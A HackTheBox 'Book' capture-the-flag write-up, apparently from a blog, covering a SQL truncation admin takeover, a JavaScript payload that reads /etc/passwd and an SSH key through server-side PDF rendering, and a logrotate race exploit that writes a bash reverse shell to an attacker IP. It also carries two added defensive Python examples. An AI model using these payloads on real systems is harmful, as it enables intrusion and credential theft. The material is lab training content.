Preamble
Back to the HackTheBox writeup series: HackTheBox retired Book, rated Medium, yesterday. This article was written on March 24 but is only being published now. Let's see how this one plays out.
Get User
An nmap scan shows that the server has a website on port 80. Registering a normal account works without problems, but trying to register with the email admin@book.htb fails because that account already exists.
Remember the trick from the old Postbook writeup: register with the admin's email address in just the right form, then log in again, and you are admin.
```http
POST /index.php HTTP/1.1
Host: 10.10.10.176
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.176/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Connection: close
Cookie: PHPSESSID=ace5kg7uekbf6mo1bjjcb3iq6h
Upgrade-Insecure-Requests: 1

name=admin&email=admin%40book.htb 11&[email protected]
```
This is called a SQL truncation attack: the submitted email is padded beyond the length of the email column, so it no longer equals the existing account when the duplicate check runs, but the database truncates it back down to admin@book.htb when it is stored. Truncating the SQL string this way bypasses the check on the name.
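To make the mechanism concrete, here is an added example (not code from the writeup or from the Book application) that models the registration flow on both sides of the bug. The column width of 20 characters, the toy table and the two handler functions are constructed assumptions that mimic a database storing VARCHAR values without strict mode, and it goes beyond the page by showing the hardened handler next to the vulnerable one.

```python
# Added example (not part of the writeup): a toy model of the registration
# flow behind a SQL truncation bypass. The column width of 20 characters, the
# table class and the registration handlers are constructed assumptions that
# mimic a database storing VARCHAR values without strict mode.
EMAIL_COLUMN_WIDTH = 20  # assumed width of the users.email column


class UserTable:
    """Toy users table. insert_truncating() mimics a non-strict database that
    silently cuts the value to the column width; rstrip() mimics PAD SPACE
    collations, under which trailing blanks are ignored in comparisons."""

    def __init__(self):
        self.rows = []  # list of (stored_email, name)

    def find(self, email):
        return [name for stored, name in self.rows if stored == email]

    def insert_truncating(self, name, email):
        stored = email[:EMAIL_COLUMN_WIDTH].rstrip()
        self.rows.append((stored, name))
        return stored


def register_vulnerable(table, name, email):
    """Uniqueness check on the raw input, then a truncating insert.
    A padded value such as 'admin@book.htb' + blanks + '1' is not equal to the
    existing email, so the check passes; the store then cuts it back down and a
    second row now answers to the admin's email."""
    if table.find(email):
        return "exists"
    table.insert_truncating(name, email)
    return "created"


def register_hardened(table, name, email):
    """Validate the exact value that will be stored before checking uniqueness:
    normalise, reject embedded whitespace and anything longer than the column."""
    email = email.strip().lower()
    if " " in email or len(email) > EMAIL_COLUMN_WIDTH:
        return "invalid"
    if table.find(email):
        return "exists"
    table.insert_truncating(name, email)  # nothing left to truncate
    return "created"


def demo():
    """Run both handlers against a table that already holds the admin account."""
    results = {}
    for label, handler in (("vulnerable", register_vulnerable), ("hardened", register_hardened)):
        table = UserTable()
        table.insert_truncating("admin", "admin@book.htb")
        outcome = handler(table, "attacker", "admin@book.htb      1")
        results[label] = (outcome, table.find("admin@book.htb"))
    return results


if __name__ == "__main__":
    for label, (outcome, owners) in demo().items():
        print(f"{label}: registration -> {outcome}; rows answering to admin@book.htb: {owners}")
```

In the vulnerable path the padded value slips past the check and a second row ends up matching the admin's email; in the hardened path the value is rejected before it reaches the database. In a real deployment the same bug is closed at the storage layer as well: a UNIQUE constraint on the column and strict SQL mode, so that an over-long value raises an error instead of being silently truncated.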
Register the admin account, then look around to see what functions exist.
There is a Collections function for posting books, and the admin has a function to view the list of collections.
This is the content of Collections.
Here the website takes the title and author and writes them into a PDF generated with server-side JS. JavaScript placed in those fields therefore runs during PDF generation, and it can be used to write a local file into the PDF so that the file can be read.
```html
<script>
x = new XMLHttpRequest;
x.onload = function () {
    document.write(this.responseText)
};
x.open("GET", "file:///etc/passwd");
x.send();
</script>
```
Fill in the title with the payload above, and the generated PDF contains the result: the contents of /etc/passwd.
Reading /etc/passwd shows a user named reader, so the SSH private key can be guessed to be at /home/reader/.ssh/id_rsa. Reading that file the same way gives the key needed to ssh to the server.
Obtain the private key file, which can be used to ssh to the server
Because the PDF does not display the full private key, use a pdf-to-text tool to extract all of the text from the PDF file, for example https://github.com/pdfminer/pdfminer.six/
With the complete private key, ssh to the server.
Get the User flag
Get Root
Run pspy64 to watch the processes running on the server.
Root is running the logrotate program on a log file. Searching Google for exploits against it turns up logrotten: https://github.com/whotwagner/logrotten
Compile logrotten with gcc and push it up to the box. Following the instructions on the GitHub page, create a payload file saved as payloadfile:
```console
reader@book:/tmp$ echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" > payloadfile
```
Then run the program against the access.log file found in the user's backups folder:
```console
reader@book:/tmp$ ./logrotten -p ./payloadfile ~/backups/access.log -d
logfile: /home/reader/backups/access.log
logpath: /home/reader/backups
logpath2: /home/reader/backups2
targetpath: /etc/bash_completion.d/access.log
targetdir: /etc/bash_completion.d
p: access.log
Waiting for rotating /home/reader/backups/access.log...
Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
```
Open another terminal and write to the access.log file:
```console
reader@book:~$ echo '1' > backups/access.log
```
The shell that comes back to the listener on port 4444 only lives for about 5 seconds before the connection is closed, so once root, read the flag immediately.
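What makes this escalation possible is a root-run logrotate job operating on a log inside a directory that an unprivileged user controls, without an `su` directive telling logrotate to drop privileges. The following is an added example, not code from the writeup or from the logrotten project, that audits a logrotate configuration for exactly that condition. The parser, the config text, the `/home/reader/backups` ownership table and the `su reader reader` fix are constructed assumptions; a real run would read /etc/logrotate.d/* and take ownership from os.stat().

```python
# Added example (not from the writeup): a small audit for logrotate
# configurations that would rotate, as root, a log whose directory is
# controlled by an unprivileged user. The parser, the config text and the
# directory ownership table are constructed assumptions; a real run would
# read /etc/logrotate.d/* and use os.stat() for ownership.
import os
import re

SAMPLE_CONFIG = """
# constructed config, not the box's real logrotate entry
/home/reader/backups/access.log {
    daily
    rotate 5
    create
    missingok
}

/var/log/syslog {
    su root adm
    weekly
    rotate 4
    compress
}
"""

# Constructed stand-in for os.stat(): directory -> (owner, writable by non-root)
SAMPLE_DIR_INFO = {
    "/home/reader/backups": ("reader", True),
    "/var/log": ("root", False),
}

BLOCK = re.compile(r"([^{}]+?)\{([^}]*)\}", re.DOTALL)


def parse_logrotate(text):
    """Return [(paths, directives)] for each `path ... { ... }` block.
    Only the last non-comment line before '{' is treated as the path list."""
    blocks = []
    for m in BLOCK.finditer(text):
        header = [l.strip() for l in m.group(1).splitlines()
                  if l.strip() and not l.strip().startswith("#")]
        paths = header[-1].split() if header else []
        directives = [l.strip() for l in m.group(2).splitlines()
                      if l.strip() and not l.strip().startswith("#")]
        blocks.append((paths, directives))
    return blocks


def audit(blocks, dir_info):
    """Flag blocks lacking an `su` directive whose log directory is owned or
    writable by a non-root user: logrotate then renames and creates files as
    root inside a directory that user can replace or symlink."""
    findings = []
    for paths, directives in blocks:
        has_su = any(d.split()[0] == "su" for d in directives)
        creates = any(d.split()[0] == "create" for d in directives)
        for path in paths:
            directory = os.path.dirname(path)
            owner, writable = dir_info.get(directory, ("root", False))
            if has_su or (owner == "root" and not writable):
                continue
            findings.append({
                "path": path,
                "directory": directory,
                "owner": owner,
                "creates_as_root": creates,
                "fix": f"add 'su {owner} {owner}' to the block or move the log under a root-owned directory",
            })
    return findings


def demo():
    """Audit the constructed config, then the same config with an su line added."""
    before = audit(parse_logrotate(SAMPLE_CONFIG), SAMPLE_DIR_INFO)
    fixed = SAMPLE_CONFIG.replace("    daily\n", "    su reader reader\n    daily\n", 1)
    after = audit(parse_logrotate(fixed), SAMPLE_DIR_INFO)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for f in before:
        print(f"[!] {f['path']}: dir {f['directory']} owned by {f['owner']}, "
              f"create={f['creates_as_root']} -> {f['fix']}")
    print(f"after adding su: {len(after)} finding(s)")
```

The audit reports the access.log block once and goes quiet after the `su reader reader` line is added, because rotation then runs with the directory owner's privileges and a symlinked directory no longer lets root write outside it. Keeping user-writable logs out of root-run jobs, or at minimum pinning them with `su`, is the configuration-level fix; upgrading logrotate so it refuses to rotate in insecurely owned directories is the complementary one.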
Conclusion
A post with quite a few techniques in it; hopefully everyone can learn something from it. Happy hacking!